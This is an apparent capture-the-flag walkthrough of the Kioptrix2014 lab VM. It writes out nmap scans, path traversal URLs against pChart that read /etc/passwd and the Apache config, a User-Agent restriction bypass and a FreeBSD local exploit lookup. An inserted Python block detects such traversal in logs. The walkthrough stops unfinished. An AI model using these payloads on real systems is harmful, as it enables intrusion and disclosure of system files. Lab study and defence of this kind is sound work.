Kioptrix2014 – Finally

Kioptrix2014 is one of the most recommended machines to play around with before starting OSCP preparation. Therefore, I am very eager to shell the box 🙂

Setup:

mountroot> ufs:/dev/ada0p2

*****

Kali Machine IP: 192.168.56.102

Step 0:

ifconfig

Kioptrix Machine IP: 192.168.56.101   (how?)

Step 1:

nmap -sn 192.168.56.102/24

-sn: ping scan (host discovery only, no port scan)

Step 2:

nmap -sC -sV -p- -A -T4 192.168.56.101 -oN nmap.log

Output:

PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
|_http-title: Site doesn't have a title (text/html).
8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
|_http-title: 403 Forbidden

Step 3:

As always, let’s check whether we can find anything in robots.txt and the page source.

No luck with robots.txt

Source code meta tag reveals something interesting!

Let’s visit the link: http://192.168.56.101/pChart2.1.3/examples/index.php

Step 4:

I went through the folders looking for some upload function (I was expecting to upload a shell through which I could get a reverse connection, but no luck, lol).

Therefore, I had to do some shopping on exploit-db.

searchsploit pChart

cat /usr/share/exploitdb/exploits/php/webapps/31173.txt | less

We received ample information, but I am more interested in this highlighted one 🙂

Step 05:

Append this query string to index.php:

?Action=View&Script=%2f..%2f..%2fetc/passwd

By the way, %2f is the URL encoding of /; you can learn more about it here.

Therefore, the complete link is:

http://192.168.56.101/pChart2.1.3/examples/index.php?Action=View&Script=/../../etc/passwd

Step 06:

With a lot of things going through my mind about what to do next, I realized the importance of having a steady methodology or approach.

Anyway, at this point I really can’t think of a way to proceed further, so let us check the nmap result again: we see that port 8080 is also open. Let’s check what is served there.

It appears that the server is hiding something from us. Let’s check the Apache configuration; we can read it the same way we read /etc/passwd.

Visit this link (additional resource on finding the location of the Apache config file: here):

http://192.168.56.101/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

You can see that access is restricted based on the User-Agent header. Let’s configure our browser.
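Both file reads in Steps 05 and 06 go through the same Script parameter, so here is the defender’s side of it, as an added example that is not code from the original post or from the pChart project: a Python script that decodes the parameter the way the server effectively sees it (so %2f..%2f and /../ collapse to the same path), runs a detector over Apache access-log lines, and shows the allowlisted lookup the application should have used. The webroot path in BASE_DIR, the log lines and the example.php name are constructed assumptions; the payload strings and the httpd.conf path are the ones from the post.

```python
"""Defender's view of the pChart 'Script' parameter traversal used in this post.

Added example, not code from the original post or from pChart. It shows
(1) how the encoded payload decodes to the same path as the plain one,
(2) a detector that runs over Apache access-log lines and flags requests
whose Script value escapes the examples directory, and (3) the hardened
lookup the application should have done. BASE_DIR and the log lines are
constructed for the demonstration; the Kioptrix webroot is not known here.
"""
import re
from pathlib import PurePosixPath
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumed install location of the examples directory (hypothetical path).
BASE_DIR = PurePosixPath("/var/www/pChart2.1.3/examples")

# Apache combined log format, only the fields needed here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[^"]*" (?P<status>\d{3})'
)


def normalise_param(raw: str) -> str:
    """Percent-decode until the value stops changing (bounded), so that
    %2f..%2f and even double-encoded %252f..%252f reduce to /../ like the
    plain form. This is what the server effectively sees."""
    decoded = raw
    for _ in range(3):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded


def has_traversal(script_param: str) -> bool:
    """True if any path segment of the decoded value is '..'."""
    return ".." in PurePosixPath(normalise_param(script_param)).parts


def resolve_script(script_param: str, base_dir: PurePosixPath = BASE_DIR):
    """Hardened lookup: collapse '.' and '..' lexically and refuse anything
    that would climb above base_dir. Returns the resolved path or None.
    (PurePosixPath does not collapse '..' itself, so it is done by hand.)"""
    decoded = normalise_param(script_param).lstrip("/")
    kept = []
    for part in PurePosixPath(decoded).parts:
        if part in ("", "."):
            continue
        if part == "..":
            if not kept:
                return None          # would leave the examples directory
            kept.pop()
            continue
        kept.append(part)
    if not kept:
        return None                  # empty request, nothing to serve
    return base_dir.joinpath(*kept)


def scan_access_log(lines):
    """Return one finding per request whose Script parameter traverses."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        for key, value in parse_qsl(query):   # parse_qsl decodes once already
            if key == "Script" and has_traversal(value):
                findings.append({
                    "ip": m["ip"],
                    "status": int(m["status"]),
                    "script": normalise_param(value),
                })
    return findings


# Constructed log lines: the two payload forms from the post, the config read,
# a legitimate example page and an unrelated request.
SAMPLE_LOG = [
    '192.168.56.102 - - [01/Jan/2019:12:00:01 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '192.168.56.102 - - [01/Jan/2019:12:00:05 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=/../../etc/passwd HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '192.168.56.102 - - [01/Jan/2019:12:00:09 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=example.php HTTP/1.1" 200 4011 "-" "Mozilla/5.0"',
    '192.168.56.102 - - [01/Jan/2019:12:01:30 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf HTTP/1.1" 200 18220 "-" "Mozilla/5.0"',
    '192.168.56.102 - - [01/Jan/2019:12:01:45 +0000] "GET /robots.txt HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ip']} status={f['status']} read {f['script']}")
```

Run it directly and it reports the three traversal requests in the constructed log: the plain /../ form is caught even though nothing in it is percent-encoded, and the bounded decode loop also handles a double-encoded variant. The resolve_script() lookup is the fix side: a request that would climb out of the examples directory returns None instead of a path to open.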

Step 07:

User-Agent ^Mozilla/4.0 Mozilla4_browser

Usually I use Burp Suite for this purpose, but this time let’s use a browser add-on instead. I am using Firefox, and we will use this user-agent switcher.

  • Click on the add-on icon
  • Then click on the Firefox icon
  • Click on the pen (edit) icon
  • Paste the string Mozilla/4.0 Mozilla4_browser

Then I visited the URL again and found an interesting application running on it.

This application has no upload function either, so we are left with no option other than shopping on exploit-db again.

searchsploit freebsd 9.0

cp /usr/share/exploitdb/exploits/freebsd/local/28718.c .

I copied the exploit code to my current directory (which is represented by the trailing .).

Step 08:

There was an error when I tried to compile the exploit code. I googled it and thought it might be an old issue. No, it wasn’t 🙁

To compile the C program:

gcc -o exploit 28718.c

Error output:

28718.c:25:10: fatal error: machine/cpufunc.h: No such file or directory
#include <machine/cpufunc.h>
^~~~~~~~~~~~~~~~~~~
compilation terminated.

Nevertheless, we still have one more exploit; remember Step 06?

Step 09:

To be continued
